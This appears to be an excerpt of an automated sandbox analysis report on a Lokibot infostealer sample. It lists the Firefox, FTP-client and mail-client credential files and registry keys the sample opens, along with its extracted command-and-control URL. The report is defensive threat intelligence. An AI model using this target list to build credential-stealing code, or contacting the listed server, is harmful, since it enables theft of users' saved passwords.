Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\key3.dbJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\cert8.dbJump to behavior
Tries to harvest and steal ftp login credentialsShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
Tries to steal Mail credentials (via file access)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\IncrediMail\IdentitiesJump to behavior
Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
Tries to steal Mail credentials (via file registry)Show sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: PopPassword4_2_0040D069
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: SmtpPassword4_2_0040D069

Malware Configuration

Threatname: Lokibot

{"c2:": "http://toyo-at-jp.info/ig1/fre.php"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET